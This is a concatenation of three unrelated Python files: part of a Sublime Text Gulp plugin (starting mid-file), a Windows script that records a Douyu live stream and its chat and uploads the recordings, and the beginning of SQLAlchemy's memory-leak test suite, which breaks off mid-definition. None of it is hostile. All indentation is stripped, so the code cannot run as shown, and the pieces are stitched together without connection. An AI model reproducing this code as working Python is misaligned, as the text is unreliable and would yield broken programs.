from .cross_platform_process import CrossPlatformProcess
from .hasher import Hasher
from .gulp_version import GulpVersion
from .plugins import PluginList, PluginRegistryCall
from .caches import ProcessCache, CacheFile
from .status_bar import StatusBar
from .timeout import set_timeout, defer, defer_sync, async
else:
from base_command import BaseCommand
from settings import Settings
from progress_notifier import ProgressNotifier
from cross_platform_process import CrossPlatformProcess
from hasher import Hasher
from gulp_version import GulpVersion
from plugins import PluginList, PluginRegistryCall
from caches import ProcessCache, CacheFile
from status_bar import StatusBar
from timeout import set_timeout, defer, defer_sync, async
#
# Commands
#
class GulpCommand(BaseCommand):
log_file_name = 'sublime-gulp.log'
allowed_extensions = [".babel.js", ".js"]
def work(self):
self.folders = []
self.gulp_files = []
self.list_gulp_files()
def list_gulp_files(self):
self.append_paths()
if not self.check_for_gulpfile:
self.gulp_files = self.folders
if len(self.gulp_files) > 0:
self.choose_file()
else:
sufix = "on:\n- %s" % "\n- ".join(self.searchable_folders) if len(self.searchable_folders) > 0 else ""
if not self.settings.get("recursive_gulpfile_search", False):
sufix += '\n\nCheck the recursive_gulpfile_search setting for nested gulpfiles'
self.error_message("gulpfile not found %s" % sufix)
def append_paths(self):
gulpfile_paths = self.settings.get("gulpfile_paths", [])
ignored_gulpfile_folders = self.settings.get("ignored_gulpfile_folders", [])
if self.settings.get("recursive_gulpfile_search", False):
for folder_path in self.searchable_folders:
for dir, dirnames, files in os.walk(folder_path):
dirnames[:] = [dirname for dirname in dirnames if dirname not in ignored_gulpfile_folders]
self.append_to_gulp_files(dir)
else:
for folder_path in self.searchable_folders:
self.append_to_gulp_files(folder_path)
for inner_folder in gulpfile_paths:
if(os.name == 'nt'):
inner_folder = inner_folder.replace("/", "\\")
self.append_to_gulp_files(os.path.join(folder_path, inner_folder))
def append_to_gulp_files(self, folder_path):
gulpfile_path = self.get_gulpfile_path(folder_path)
self.folders.append(folder_path)
if os.path.exists(gulpfile_path) and gulpfile_path not in self.gulp_files:
self.gulp_files.append(gulpfile_path)
def choose_file(self):
if len(self.gulp_files) == 1:
self.show_tasks_from_gulp_file(0)
else:
self.show_quick_panel(self.gulp_files, self.show_tasks_from_gulp_file)
def show_tasks_from_gulp_file(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
if self.task_name is not None:
self.run_gulp_task()
else:
defer(self.show_tasks)
def show_tasks(self):
self.tasks = self.list_tasks()
if self.tasks is not None:
self.show_quick_panel(self.tasks, self.task_list_callback)
def list_tasks(self):
try:
self.callcount = 0
json_result = self.fetch_json()
except TypeError as e:
self.error_message("Could not read available tasks.\nMaybe the JSON cache (.sublime-gulp.cache) is malformed?")
except Exception as e:
print(traceback.format_exc())
self.error_message(str(e))
else:
tasks = [[name, self.dependencies_text(task)] for name, task in json_result.items()]
return sorted(tasks, key=lambda task: task)
def dependencies_text(self, task):
return "Dependencies: " + task['dependencies'] if task['dependencies'] else ""
def fetch_json(self):
cache_file = CacheFile(self.working_dir)
gulpfile = self.get_gulpfile_path(self.working_dir)
data = None
if cache_file.exists():
filesha1 = Hasher.sha1(gulpfile)
data = cache_file.read()
if gulpfile in data and data[gulpfile]["sha1"] == filesha1:
return data[gulpfile]["tasks"]
self.callcount += 1
if self.callcount == 1:
return self.write_to_cache()
if data is None:
raise Exception("Could not write to cache gulpfile.")
if gulpfile in data:
raise Exception("Sha1 from gulp cache ({0}) is not equal to calculated ({1}).\nTry erasing the cache and running Gulp again.".format(data[gulpfile]["sha1"], filesha1))
else:
raise Exception("Have you renamed a folder?.\nSometimes Sublime doesn't update the project path, try removing the folder from the project and adding it again.")
def write_to_cache(self):
process = CrossPlatformProcess(self.working_dir)
(stdout, stderr) = process.run_sync(r'node "%s/write_tasks_to_cache.js"' % self.settings.package_path())
if process.failed:
try:
self.write_to_cache_without_js()
except:
if process.returncode() == 127:
raise Exception("\"node\" command not found.\nPlease be sure to have nodejs installed on your system and in your PATH (more info in the README).")
elif stderr:
self.log_errors(stderr)
raise Exception("There was an error running gulp, make sure gulp is running correctly in your project.\nFor more info check the sublime-gulp.log file")
return self.fetch_json()
def write_to_cache_without_js(self):
process = CrossPlatformProcess(self.working_dir)
(stdout, stderr) = process.run_sync(r'gulp -v')
if process.failed or not GulpVersion(stdout).supports_tasks_simple():
raise Exception("Gulp: Could not get the current gulp version or your gulp CLI version is lower than 3.7.0")
(stdout, stderr) = process.run_sync(r'gulp --tasks-simple')
gulpfile = self.get_gulpfile_path(self.working_dir)
if not stdout:
raise Exception("Gulp: The result of `gulp --tasks-simple` was empty")
CacheFile(self.working_dir).write({
gulpfile: {
"sha1": Hasher.sha1(gulpfile),
"tasks": dict((task, { "name": task, "dependencies": "" }) for task in stdout.split("\n") if task)
}
})
def get_gulpfile_path(self, base_path):
for extension in GulpCommand.allowed_extensions:
gulpfile_path = os.path.join(base_path, "gulpfile" + extension)
if os.path.exists(gulpfile_path):
return os.path.normpath(gulpfile_path)
return gulpfile_path
def log_errors(self, text):
if not self.settings.get("log_errors", True):
return
log_path = os.path.join(self.working_dir, GulpCommand.log_file_name)
header = "Remember that you can report errors and get help in https://github.com/nicosantangelo/sublime-gulp" if not os.path.isfile(log_path) else ""
timestamp = str(datetime.now().strftime("%m-%d-%Y %H:%M"))
with codecs.open(log_path, "a", "utf-8", errors='replace') as log_file:
log_file.write(header + "\n\n" + timestamp + ":\n" + text)
def task_list_callback(self, task_index):
if task_index > -1:
self.task_name = self.tasks[task_index][0]
self.task_flag = self.get_flag_from_task_name()
self.run_gulp_task()
def run_gulp_task(self):
task = self.construct_gulp_task()
Thread(target=self.run_process, args=(task, )).start()
def construct_gulp_task(self):
self.show_running_status_in_output_panel()
return r"gulp %s %s" % (self.task_name, self.task_flag)
def run_process(self, task):
process = CrossPlatformProcess(self.working_dir)
process.run(task)
self.status_bar.update()
stdout, stderr = process.communicate(self.append_to_output_view_in_main_thread)
defer_sync(lambda: self.finish(stdout, stderr))
def finish(self, stdout, stderr):
finish_message = "gulp %s %s finished %s" % (self.task_name or '', self.task_flag, "with some errors." if stderr else "!")
self.status_message(finish_message)
self.status_bar.update()
if not self.silent:
self.set_output_close_on_timeout()
elif stderr and self.settings.get("show_silent_errors", False):
self.silent = False
self.show_running_status_in_output_panel()
self.append_to_output_view(stdout)
self.append_to_output_view(stderr)
self.silent = True
def show_running_status_in_output_panel(self):
with_flag_text = (' with %s' % self.task_flag) if self.task_flag else ''
self.show_output_panel("Running '%s'%s...\n" % (self.task_name, with_flag_text))
class GulpArbitraryCommand(GulpCommand):
def show_tasks_from_gulp_file(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
self.show_input_panel(caption="gulp", on_done=self.after_task_input)
def after_task_input(self, task_name=None):
if task_name:
self.task_name = task_name
self.task_flag = ''
self.run_gulp_task()
class GulpLastCommand(BaseCommand):
def work(self):
if ProcessCache.last_task_name:
task_name = ProcessCache.last_task_name
self.window.run_command("gulp", { "task_name": task_name })
else:
self.status_message("You need to run a task first")
class GulpKillTaskCommand(BaseCommand):
def work(self):
ProcessCache.refresh()
if ProcessCache.empty():
self.status_message("There are no running tasks")
else:
self.procs = ProcessCache.get()
quick_panel_list = [[process.last_command, process.working_dir, 'PID: %d' % process.pid] for process in self.procs]
self.show_quick_panel(quick_panel_list, self.kill_process, font=0)
def kill_process(self, index=-1):
if index >= 0 and index < len(self.procs):
process = self.procs[index]
try:
process.kill()
except ProcessLookupError as e:
print('Process %d seems to be dead already' % process.pid)
self.show_output_panel('')
self.append_to_output_view("\n%s killed! # %s | PID: %d\n" % process.to_tuple())
class GulpKillCommand(BaseCommand):
def work(self):
ProcessCache.refresh()
if ProcessCache.empty():
self.status_message("There are no running tasks")
else:
self.append_processes_to_output_view()
ProcessCache.kill_all()
self.append_to_output_view("\nAll running tasks killed!\n")
def append_processes_to_output_view(self):
self.show_output_panel("\nFinishing the following running tasks:\n")
ProcessCache.each(lambda process: self.append_to_output_view("$ %s # %s | PID: %d\n" % process.to_tuple()))
class GulpShowPanelCommand(BaseCommand):
def work(self):
self.show_panel()
class GulpHidePanelCommand(BaseCommand):
def work(self):
self.close_panel()
class GulpPluginsCommand(BaseCommand):
def work(self):
self.plugins = None
self.request_plugin_list()
def request_plugin_list(self):
progress = ProgressNotifier("%s: Working" % Settings.PACKAGE_NAME)
thread = PluginRegistryCall()
thread.start()
self.handle_thread(thread, progress)
def handle_thread(self, thread, progress):
if thread.is_alive() and not thread.error:
set_timeout(lambda: self.handle_thread(thread, progress), 100)
else:
progress.stop()
if thread.result:
plugin_response = json.loads(thread.result.decode('utf-8'))
self.plugins = PluginList(plugin_response)
self.show_quick_panel(self.plugins.quick_panel_list(), self.open_in_browser, font=0)
else:
self.error_message(self.error_text_for(thread))
def error_text_for(self, thread):
error_tuple = (
"The plugin repository seems to be down.",
"If http://gulpjs.com/plugins is working, please report this issue at the Sublime Gulp repo (https://github.com/nicosantangelo/sublime-gulp).",
"Thanks!",
thread.error
)
return "\n\n%s\n\n%s\n\n%s\n\n%s" % error_tuple
def open_in_browser(self, index=-1):
if index >= 0 and index < self.plugins.length:
webbrowser.open_new(self.plugins.get(index).get('homepage'))
class GulpDeleteCacheCommand(GulpCommand):
def choose_file(self):
if len(self.gulp_files) == 1:
self.delete_cache(0)
else:
self.show_quick_panel(self.gulp_files, self.delete_cache)
def delete_cache(self, file_index):
if file_index > -1:
self.working_dir = self.gulp_files[file_index]
try:
cache_file = CacheFile(self.working_dir)
if cache_file.exists():
cache_file.remove()
self.status_message('Cache removed successfully')
except Exception as e:
self.status_message("Could not remove cache: %s" % str(e))
class GulpExitCommand(sublime_plugin.WindowCommand):
def run(self):
try:
self.window.run_command("gulp_kill")
finally:
self.window.run_command("exit")
class GulpUpdateStatusBarCommand(sublime_plugin.TextCommand):
def run(self, edit):
if self.view.settings().get('is_widget'):
return
window = self.view.window()
if not window or \
(self.view.file_name() and
self.view == window.transient_view_in_group(window.active_group())):
# it means it is a transient view of a regular file
return
StatusBar(window).update()
def plugin_loaded():
def load_process_cache():
for process in ProcessCache.get_from_storage():
ProcessCache.add(
CrossPlatformProcess(process['working_dir'], process['last_command'], process['pid'])
)
async(load_process_cache, 200, silent=True)
if not is_sublime_text_3:
plugin_loaded()
|
run_win.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import re
import time
import shutil
import subprocess
from threading import Thread
from datetime import datetime
from api import douyu_opencdn
from utils.common import makesure_dir
from utils.common import kill_pid
from utils.common import list_only_dir
from utils.common import log_init
from utils.common import log_print
from utils.common import get_delta_minute
from utils.common import exist_cmd
from utils.common import ping
from utils.site import make_site_cover
from utils.site import make_site_screenshot
from utils.site import make_site_moment
from utils.site import get_topN_moments
from utils.site import remove_site_moment
from utils.ffmpeg import remake_video
from utils.ffmpeg import reencode_video
from utils.ffmpeg import flv_to_mp4
from utils.baiducloud import CloudManager
from utils.danmu_analysis import get_moment
from utils.danmu_file_maker import DanMuFileMaker
from win10toast import ToastNotifier
# Global Settings
# Live Settings
live_id = 'zard'
live_id_num = '60937'
live_online = False
sleep_sec = 30
live_max_minute = 120
danmu_record = None
max_moments = []
# reencode machine
use_reencode = True
reencode_host = 'YANETUT_PC'
reencode_path = '\\\\%s\\src\\' % reencode_host
# win10 toast
toaster = ToastNotifier()
toast_title = live_id.upper()
toast_info = '翔哥开播啦!!'  # i.e. "Xiang-ge (the streamer) has gone live!!"
toast_ico_path = '%s.ico' % live_id
# Dir and File Settings
dir_home = os.getcwd()
# log dir
dir_log = os.path.join(dir_home, 'log')
log_file = os.path.join(dir_log, 'run_%s.log' % (live_id))
# local dir
dir_local = os.path.join(dir_home, 'local')
dir_live = os.path.join(dir_local, 'live', live_id)
dir_danmu = os.path.join(dir_local, 'danmu')
# site dir
site_dir = os.path.join(dir_local, 'site')
dir_site_cover = os.path.join(site_dir, 'cover')
dir_site_screenshot = os.path.join(site_dir, 'screenshot')
dir_site_moment = os.path.join(site_dir, 'moment')
# local sync dir
dir_cloud = os.path.join(dir_home, 'cloud')
dir_cloud_live = os.path.join(dir_cloud, 'live', live_id)
dir_cloud_danmu = os.path.join(dir_cloud, 'danmu', live_id)
dir_cloud_site = os.path.join(dir_cloud, 'site')
dir_cloud_site_cover = os.path.join(dir_cloud_site, 'cover')
dir_cloud_site_screenshot = os.path.join(dir_cloud_site, 'screenshot')
dir_cloud_site_moment = os.path.join(dir_cloud_site, 'moment')
def start_you_get(filename, live_date_dir):
# downloader output
downloader_out_file = os.path.join(dir_log, 'downloader_%s.out' % (live_id))
with open(downloader_out_file, 'w+', encoding='utf-8') as downloader_out:
# downloader you-get
cmd = ('you-get -o %s -O %s.flv %s%s' % (live_date_dir, filename,
douyu_opencdn.URL_LIVE_DOUYU, live_id_num))
you_get_proc = subprocess.Popen(cmd,
stdout=downloader_out,
stderr=downloader_out)
# wait for you-get to start successfully, or give up on timeout / error
with open(downloader_out_file, 'r', encoding='utf-8',
errors='ignore') as outfile:
line = outfile.readline()
line_count = 1
while (not re.match(r'.*time=.*', line)
and line_count <= 800
and you_get_proc.poll() is None):
time.sleep(0.1)
line = outfile.readline()
line_count += 1
# decide whether the output matched, or we hit the timeout / an error exit
if line_count > 800 or you_get_proc.poll() is not None:
# you-get failed, return None
# kill_pid(you_get_proc.pid)
you_get_proc = None
log_print('you-get FAILED, total_line: %d' % line_count)
# you-get is running normally
else:
log_print('you-get SUCCESS, total_line: %d' % line_count)
return you_get_proc
def wait_record_live():
date_live = datetime.now().date().isoformat()
dir_live_date = os.path.join(dir_live, date_live)
makesure_dir(dir_live_date)
live_time_start = time.strftime('%H-%M', time.localtime())
you_get_proc = start_you_get(live_time_start, dir_live_date)
if you_get_proc is not None:
live_file = os.path.join(dir_live_date, '%s.flv' % live_time_start)
# start_record_danmu
danmu_url = '%s%s' % (douyu_opencdn.URL_LIVE_DOUYU, live_id_num)
dmfm = DanMuFileMaker(danmu_url, dir_live_date)
dmfm.start()
try:
you_get_proc.wait(live_max_minute * 60)
except subprocess.TimeoutExpired:
kill_pid(you_get_proc.pid)
dmfm.stop()
# record live offline date and time
live_time_stop = time.strftime('%H-%M', time.localtime())
name_format = '%s__%s_%s' % (live_id, live_time_start, live_time_stop)
log_print('stop record live, name: %s' % name_format)
# rename the live file to append the stop time
ret = False
try_time = 3
try_wait = 5
while not ret and try_time:
try:
if os.path.exists(live_file):
new_file = os.path.join(os.path.dirname(live_file),
'%s.flv' % name_format)
os.rename(live_file, new_file)
ret = True
except:
log_print('rename error and wait', lv=1)
ret = False
try_time -= 1
time.sleep(try_wait)
danmu_file = os.path.join(dir_live_date, '%s.xml' % live_id_num)
ret = False
try_time = 3
while not ret and try_time:
try:
if os.path.exists(danmu_file):
new_file = os.path.join(os.path.dirname(danmu_file),
'%s.xml' % name_format)
os.rename(danmu_file, new_file)
ret = True
except:
log_print('rename error and wait', lv=1)
ret = False
try_time -= 1
time.sleep(try_wait)
else:
time.sleep(4)
def check_live_upload():
log_print('check live upload')
dir_list = sorted(list_only_dir(dir_live))
todo_live_list = []
if dir_list:
for dir_name in dir_list:
ldir = os.path.join(dir_live, dir_name)
for f in os.listdir(ldir):
if re.match('^{live_id}__.*$'.format(live_id = live_id), f):
todo_live_list.append(os.path.join(ldir, f))
log_print('add live file: %s' % os.path.join(ldir, f))
for live_file in todo_live_list:
if re.match(r'.*\.flv$', live_file):
# use reencode machine
if use_reencode and ping(reencode_host):
continue
if exist_cmd('ffmpeg_g.exe'):
# re-encode with the GPU directly on the PC
log_print('reencode live video file: %s' % live_file)
# reencode_video(live_file, gpu=True)
reencode_video(live_file, gpu=False)
else:
# do not re-encode on the mini PC
duration_minute = get_delta_minute(
os.path.basename(live_file))
if duration_minute > live_max_minute - 5:
log_print('remake live video file: %s' % live_file)
remake_video(live_file)
return todo_live_list
def check_site_upload(cloud_manager):
global max_moments
live_dates = sorted(os.listdir(dir_site_moment))
if live_dates:
live_date = live_dates[0]
date_now = datetime.now().date()
date_live = datetime.strptime(live_date, '%Y-%m-%d').date()
lives = os.listdir(dir_live)
if not live_online and date_now > date_live and not lives:
# if not live_online and not lives:
# make site cover
moment_dir = os.path.join(dir_site_moment, live_date)
make_site_cover(moment_dir,
os.path.join(dir_site_cover, live_date))
# save room_info json file
json_file = os.path.join(dir_site_cover, live_date,
'room_info.json')
if not os.path.exists(json_file):
retry = 4
for r in range(retry):
ret = douyu_opencdn.save_json(live_id_num, json_file)
log_print('save room info json {ret}.'.format(
ret = ret))
if ret:
break
# convert moment flv to mp4
top_moment_files = os.listdir(moment_dir)
for f in top_moment_files:
if re.match(r'.*\.flv$', f):
ret = flv_to_mp4(os.path.join(moment_dir, f))
log_print('flv to mp4 {fname}:{ret}'.format(
fname = f,
ret = ret
))
if not ret:
# rename
name_mp4 = f[:-4] + '.mp4'
os.rename(os.path.join(moment_dir, f),
os.path.join(moment_dir, name_mp4))
# upload site folders
# move them into dir_cloud ourselves before registering with the cloud manager
shutil.move(os.path.join(dir_site_cover, live_date),
dir_cloud_site_cover)
shutil.move(os.path.join(dir_site_screenshot, live_date),
dir_cloud_site_screenshot)
shutil.move(os.path.join(dir_site_moment, live_date),
dir_cloud_site_moment)
max_moments = []
cloud_manager.add_cloud(os.path.join(dir_cloud_site_cover,
live_date))
cloud_manager.add_cloud(os.path.join(dir_cloud_site_screenshot,
live_date))
cloud_manager.add_cloud(os.path.join(dir_cloud_site_moment,
live_date))
if not danmu_record:
shutil.move(os.path.join(dir_danmu, live_date),
dir_cloud_danmu)
cloud_manager.add_cloud(os.path.join(dir_cloud_danmu,
live_date))
def work_record_live():
global live_online
while True:
live_online = douyu_opencdn.is_room_online(live_id_num)
log_print('live online: %s' % live_online)
if live_online:
wait_record_live()
else:
time.sleep(sleep_sec)
def work_record_danmu():
offline_delay_max = 6
offline_delay = 0
global danmu_record
while True:
if live_online:
if not danmu_record:
toaster.show_toast( toast_title,
toast_info,
icon_path=toast_ico_path,
duration=10,
threaded=True)
live_date = sorted(os.listdir(dir_live))[0]
danmu_dir = os.path.join(dir_danmu, live_date)
makesure_dir(danmu_dir)
live_time_start = time.strftime('%H-%M', time.localtime())
danmu_url = '%s%s' % (douyu_opencdn.URL_LIVE_DOUYU, live_id_num)
danmu_record = DanMuFileMaker(danmu_url, danmu_dir)
log_print('start record danmu')
danmu_record.start()
else:
if offline_delay > offline_delay_max and danmu_record:
log_print('stop record danmu')
danmu_record.stop()
live_time_stop = time.strftime('%H-%M', time.localtime())
name_format = '%s__%s_%s' % (live_id, live_time_start,
live_time_stop)
danmu_file = danmu_record.danmu_file
if os.path.exists(danmu_file):
try:
new_file = os.path.join(os.path.dirname(danmu_file),
'%s.xml' % name_format)
os.rename(danmu_file, new_file)
except FileExistsError:
log_print('FileExistsError danmufile', lv=1)
offline_delay = 0
danmu_record = None
else:
offline_delay += 1
time.sleep(sleep_sec)
def work_upload():
global max_moments
cloud_manager = CloudManager(live_id, dir_cloud_live, dir_cloud_site_cover,
dir_cloud_site_screenshot, dir_cloud_site_moment, dir_cloud_danmu)
# init max_moments
res = list_only_dir(dir_site_moment)
if res:
moment_date = res[0]
moment_dir = os.path.join(dir_site_moment, moment_date)
moment_files_name = os.listdir(moment_dir)
for moment_name in moment_files_name:
if re.match(r'.*\.xml$', moment_name):
max_moments.append(get_moment(moment_name, moment_dir))
while True:
todo_live_list = check_live_upload()
if todo_live_list:
log_print('upload list: %s' % todo_live_list)
if list_only_dir(dir_site_moment):
live_date = sorted(list_only_dir(dir_site_moment))[0]
else:
live_date = sorted(list_only_dir(dir_live))[0]
# do some site work
# screenshot
screenshot_dir = os.path.join(dir_site_screenshot, live_date)
make_site_screenshot(todo_live_list, screenshot_dir)
# moment
moments = []
for live_file in todo_live_list:
if re.match(r'.*\.xml$', live_file):
moments += get_topN_moments(live_file, 180, 3)
# new moments
new_max_moments = []
moments += max_moments
if len(moments) > 3:
for i in range(3):
max_moment = moments[0]
max_count = max_moment['max_count']
for moment in moments:
if moment['max_count'] > max_count:
max_count = moment['max_count']
max_moment = moment
new_max_moments.append(max_moment)
moments.remove(max_moment)
else:
new_max_moments = moments
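# Note: the loop above keeps the (up to) three moments with the largest
# 'max_count'. A compact equivalent, shown only as a sketch and not used by
# this script, would be:
#
#   import heapq
#   new_max_moments = heapq.nlargest(3, moments, key=lambda m: m['max_count'])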
need_delete_moments = [m for m in max_moments if m not in new_max_moments]
need_make_moments = [m for m in new_max_moments if m not in max_moments]
log_print('need_delete_moments: %s' % need_delete_moments)
log_print('need_make_moments: %s' % need_make_moments)
moment_dir = os.path.join(dir_site_moment, live_date)
makesure_dir(moment_dir)
for moment in need_delete_moments:
try:
remove_site_moment(moment, moment_dir)
except:
log_print('Error in delete moments {moment}'.format(
moment = moment['max_time_start']
), lv=1)
for moment in need_make_moments:
make_site_moment(moment, moment_dir)
max_moments = new_max_moments
# move to cloud dir
for live_file in todo_live_list:
local_upload = True
todo_date = os.path.basename(os.path.dirname(live_file))
if use_reencode and re.match(r'.*\.flv$', live_file) and ping(reencode_host):
try:
fname = os.path.basename(live_file)
dir_reencode_live_date = os.path.join(reencode_path, todo_date)
dst_file_temp = os.path.join(dir_reencode_live_date, fname + '.temp')
dst_file = os.path.join(dir_reencode_live_date, fname)
makesure_dir(dir_reencode_live_date)
shutil.move(live_file, dst_file_temp)
os.rename(dst_file_temp, dst_file)
log_print('upload to reencode %s SUCCESS' % live_file)
local_upload = False
except Exception as e:
log_print(e, lv=1)
local_upload = True
if local_upload:
dir_cloud_live_date = os.path.join(dir_cloud_live, todo_date)
makesure_dir(dir_cloud_live_date)
shutil.move(live_file, dir_cloud_live_date)
cloud_manager.add_cloud(dir_cloud_live_date)
# rm empty lives dir
live_dates = list_only_dir(dir_live)
for live_date in live_dates:
dir_live_date = os.path.join(dir_live, live_date)
if not os.listdir(dir_live_date) and not live_online:
log_print('rmdir %s' % dir_live_date)
try:
os.rmdir(dir_live_date)
except PermissionError:
log_print('PermissionError %s' % dir_live_date)
cloud_manager.check_upload()
# live end upload site and danmu
check_site_upload(cloud_manager)
time.sleep(300)
def main():
# dir settings
makesure_dir(dir_log)
makesure_dir(dir_live)
makesure_dir(dir_site_cover)
makesure_dir(dir_site_screenshot)
makesure_dir(dir_site_moment)
makesure_dir(dir_cloud_live)
makesure_dir(dir_cloud_danmu)
makesure_dir(dir_cloud_site_cover)
makesure_dir(dir_cloud_site_screenshot)
makesure_dir(dir_cloud_site_moment)
# log file setting
log_init(log_file)
t_record_live = Thread(target=work_record_live)
t_record_danmu = Thread(target=work_record_danmu)
t_upload = Thread(target=work_upload)
t_record_live.start()
time.sleep(10)
t_record_danmu.start()
t_upload.start()
if __name__ == '__main__':
main()
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.engine import result
from sqlalchemy.engine.processors import to_decimal_processor_factory
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.session import _sessions
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
# run the test N times. if length of gc.get_objects()
# keeps growing, assert false
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
class EnsureZeroed(fixtures.ORMTest):
def setup_test(self):
_sessions.clear()
clear_mappers()
# enable query caching, however make the cache small so that
# the tests don't take too long. issues w/ caching include making
# sure sessions don't get stuck inside of it. However it will
# make tests like test_mapper_reset take a long time because mappers
# are very much a part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_cycles_in_row(self):
tup = result.result_tuple(["a", "b", "c"])
@profile_memory()
def go():
obj = {"foo": {}}
obj["foo"]["bar"] = obj
row = tup([1, 2, obj])
obj["foo"]["row"] = row
del row
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo:
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(fixtures.MappedTest, EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive", "no_asyncio"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo:
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
